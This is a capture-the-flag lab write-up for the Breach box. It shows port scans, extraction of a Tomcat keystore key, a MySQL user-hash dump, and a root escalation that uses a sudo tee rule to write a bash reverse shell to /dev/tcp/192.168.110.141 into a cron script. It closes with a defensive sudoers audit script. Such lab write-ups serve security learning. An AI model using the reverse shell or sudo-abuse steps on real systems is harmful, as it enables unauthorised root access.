Lab environment:
Attacker 1: 192.168.110.141 (Kali Linux)
Target: 192.168.110.140
This is an intermediate-difficulty target. I originally planned to write up the whole process in the same way as the earlier ones, but in the end I decided to only summarise the difficulties I personally ran into while penetrating this box and what I took away from them.
root@redwand:~# masscan -p0-65535 --rate=2000 192.168.110.140
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-08 02:09:30 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 53/tcp on 192.168.110.140
root@redwand:~# nmap -p1-1000 192.168.110.140
Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-07 21:12 EST
Nmap scan report for 192.168.110.140
Host is up (0.00064s latency).
PORT STATE SERVICE
1/tcp open tcpmux
2/tcp open compressnet
3/tcp open compressnet
4/tcp open unknown
5/tcp open rje
6/tcp open unknown
7/tcp open echo
8/tcp open unknown
9/tcp open discard
10/tcp open unknown
11/tcp open systat
12/tcp open unknown
13/tcp open daytime
14/tcp open unknown
15/tcp open netstat
16/tcp open unknown
17/tcp open qotd
18/tcp open msp
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
25/tcp open smtp
26/tcp open rsftp
27/tcp open nsw-fe
28/tcp open unknown
29/tcp open msg-icp
30/tcp open unknown
31/tcp open msg-auth
32/tcp open unknown
33/tcp open dsp
34/tcp open unknown
35/tcp open priv-print
36/tcp open unknown
37/tcp open time
38/tcp open rap
......
root@redwand:~# nmap -sF -p1-65535 192.168.110.140
Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-07 21:17 EST
Nmap scan report for 192.168.110.140
Host is up (0.00014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
80/tcp open|filtered http
4444/tcp open|filtered krb524
8443/tcp open|filtered https-alt
MAC Address: 08:00:27:C3:06:80 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.31 seconds
root@Breach:~# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1038/portspoof
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 962/mysqld
tcp 0 0 192.168.110.140:55008 192.168.110.141:6666 ESTABLISHED 1530/bash
tcp6 0 0 :::80 :::* LISTEN 1124/apache2
tcp6 0 0 :::8443 :::* LISTEN 1247/java
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 1247/java
tcp6 0 0 192.168.110.140:59390 192.168.110.141:443 ESTABLISHED 1247/java
root@redwand:~# keytool -list -keystore keystore
Enter keystore password:
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 1 entry
tomcat, May 20, 2016, PrivateKeyEntry,
Certificate fingerprint (SHA-256): F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31
Warning:
The JKS keystore uses a proprietary format. It is recommended to migrate to PKCS12 which is an industry standard format using "keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12".
root@redwand:~# keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
Enter source keystore password:
Entry for alias tomcat successfully imported.
Import command completed: 1 entries successfully imported, 0 entries failed or cancelled
Warning:
Migrated "keystore" to PKCS12. The JKS keystore is backed up as "keystore.old".
root@redwand:~# openssl pkcs12 -in keystore -nocerts -nodes -out key.pem
I ran into the problem shown in the screenshot below.
Workaround: after routing the browser through the Burp proxy, I obtained the forged certificate signed by Burp, added it as trusted, and was then able to access the site.
mysql> select host,user,password from user;
select host,user,password from user;
+-----------+------------------+-------------------------------------------+
| host | user | password |
+-----------+------------------+-------------------------------------------+
| localhost | root | |
| | milton | 6450d89bd3aff1d893b85d3ad65d2ec2 |
| 127.0.0.1 | root | |
| ::1 | root | |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
blumbergh@Breach:~$echo "bash -c 'bash -i >& /dev/tcp/192.168.110.141/6666 0>&1'" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
Note that the sudo misconfiguration in this box is not the usual "just add the user to the sudo group" approach, but a fine-grained sudoers rule, as shown below. With this approach the user's home directory also has no .sudo_as_admin_successful file, so unless you log in as each user in turn and test with sudo -l, it is very easy to miss a user's sudo configuration.
blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
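As an added example (not code from the original write-up), the defender's counterpart to the per-user sudo -l check above: an administrator with root can read the sudoers files directly, and this small Python audit parses that syntax and flags rules that let a user run a file-writing program as root. The sudoers text is constructed, and the regex handles only the simple user-spec form seen on this page, not aliases, @include lines or line continuations.

```python
import re
from typing import Dict, List

# Constructed sudoers fragment (an assumption, not the box's real file): the
# blumbergh rule from the write-up plus ordinary rules for contrast.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
blumbergh ALL=(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
milton ALL=(root) /usr/bin/less /var/log/syslog
"""

# Programs that write to the file named in their arguments; running one as
# root against a script that root later executes is equivalent to root.
WRITE_CAPABLE = {"tee", "cp", "mv", "dd", "vi", "vim", "nano", "sed"}

# Simplified user-spec grammar "user host=(runas) [TAG:] cmd[, cmd]";
# aliases, @include and line continuations are deliberately not handled.
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)"
                     r"\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudoers(text: str) -> List[Dict]:
    """Return one record per (user, command) pair found in sudoers text."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if not parts:
                continue
            rules.append({
                "user": m.group("user"),
                "runas": m.group("runas").split(":")[0] or "root",
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "binary": parts[0].rsplit("/", 1)[-1],
                "args": parts[1:],
            })
    return rules

def risky_rules(rules: List[Dict]) -> List[Dict]:
    """Rules letting a user write a file as root through a write-capable binary."""
    return [r for r in rules if r["runas"] in ("root", "ALL")
            and r["binary"] in WRITE_CAPABLE and r["args"]]
```

Run it over /etc/sudoers and every file in /etc/sudoers.d; a flagged rule whose target is a script executed by root (here the cleanup job) should be removed or replaced with a dedicated, non-writable wrapper.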